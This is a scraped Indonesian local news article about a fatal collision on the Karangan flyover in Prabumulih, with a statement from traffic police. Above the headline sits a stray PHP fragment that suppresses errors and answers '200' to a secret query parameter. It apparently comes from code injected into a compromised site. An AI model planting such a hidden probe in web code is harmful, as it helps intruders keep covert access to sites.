error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Lakalantas Di Jembatan Layang Karangan Ramadhan 1443 H - SMI.COM

Home / PRABUMULIH

Jumat, 8 April 2022 - 22:36 WIB

Lakalantas Di Jembatan Layang Karangan Ramadhan 1443 H

PRABUMULIH, SMI-

 

Kembali terjadi kecelakaan maut, di dalam berlalu lintas. Informasi yang dihimpun oleh awak media ini dilapangan, menurut informasi di lapangan. Pada hari ini Jum’at 08/04/2022, sekitar pukul 11.30 WIB bertempat diJalan Raya Prabumulih-Baturaja, tepatnya jembatan layang desa Karangan, kecamatan RKT, kota Prabumulih, provinsi Sumatera Selatan.

Diduga korban kecelakaan maut ini bernama Kusnadi Suryanto bin Ali Usman Bustan. yang merupakan seorang kepala sekolah dasar di desa Jungai. Dugaan Kejadian kecelakaan naas yang telah membuat Kusnadi Suryanto meninggal dunia.

Baca Juga :  Pembentukan Pengurus Organisasi Club Elang Maut Sumatera Selatan

Berdasarkan informasi yang dihimpun, di tempat kejadian perkara (TKP) yang terjadi pada pukul 11.30 WIB, menurut informasi yang dihimpun K S mengendarai sepeda motor Jupiter MX berwarna hitam, dengan nomor polisi BG 5739 CZ. Diduga bertabrakan dengan mobil minibus Avanza/Xenia warna silver,plat nomor kendaraan dan identitasnya belum diketahui.Hal ini berdasarkan hasil olah TKP Tim Satlantas polres kota Prabumulih, serta keterangan saksi-saksi di TKP.

Sementara itu AKBP.Siswandi.Sik.SH.MH Kapolres kota Prabumulih, melalui AKP.Lastari.SH Kasatlantas polres kota Prabumulih membenarkan adanya kejadian yang mengakibatkan YT meninggal dunia di tempat kejadian perkara.

Baca Juga :  Kapolres Kota Prabumulih AKBP Siswandi Sik SH MH , Ajak MPC PP kota prabumulih Terus Galakan Aksi Sosial Kemasyarakatan

“kronologis kejadian sepeda motor Jupiter MX yang di kendarai Kusnadi Suryanto, berjalan dari arah Prabumulih menuju ke arah Batu Raja.Di duga hendak mendahului kendaraan lain.sehingga masuk ke jalur orang lain dan bertabrakan.Di duga mobil minibus Avanza/Xenia berwarna silver plat,Nopol dan identitasnya tidak diketahui (melarikan diri), yang berjalan dari arah Batu Raja menuju ke arah Prabumulih”,Ujar AKP.Lastari.SH Kasatlantas Polres Kota Prabumulih.

(Sunar)

Share :

Baca Juga

PRABUMULIH

MPC PP Prabumulih Semua Elemen Masyarakat Harus Pro-Aktif Antisipasi Penyebaran Covid-19

PRABUMULIH

HUT Kota Prabumulih ke-21 Tahun

PRABUMULIH

AKBP.Witdiardi.SIk.MH Kapolres Prabumulih Bersama Danyonzipur 2 Serbu Lakukan Latihan Menembak

PRABUMULIH

Knalpot Brong Akan Di Berantas Polres Prabumulih

PRABUMULIH

Aiptu Jhony Alias.SH Pimpin Upacara Bendera HUT Kemerdekaan RI Ke 77 Tahun Di SMKN 02 Prabumulih

PRABUMULIH

Tim Gabungan Satlantas polres & Dishub Prabumulih Melakukan Patroli Bersama Malam Minggu

PRABUMULIH

Tim Gurita Polres Prabumulih berhasil Tangkap Satu Lagi Tersangka Curat SPM, Ahmad Munir, 40 tahun

PRABUMULIH

Pemuda Pancasila kota Prabumulih Ucapkan Selamat Atas Pembangunan : FLY OVER PATIH GALUNG PRABUMULIH SUMATERA SELATAN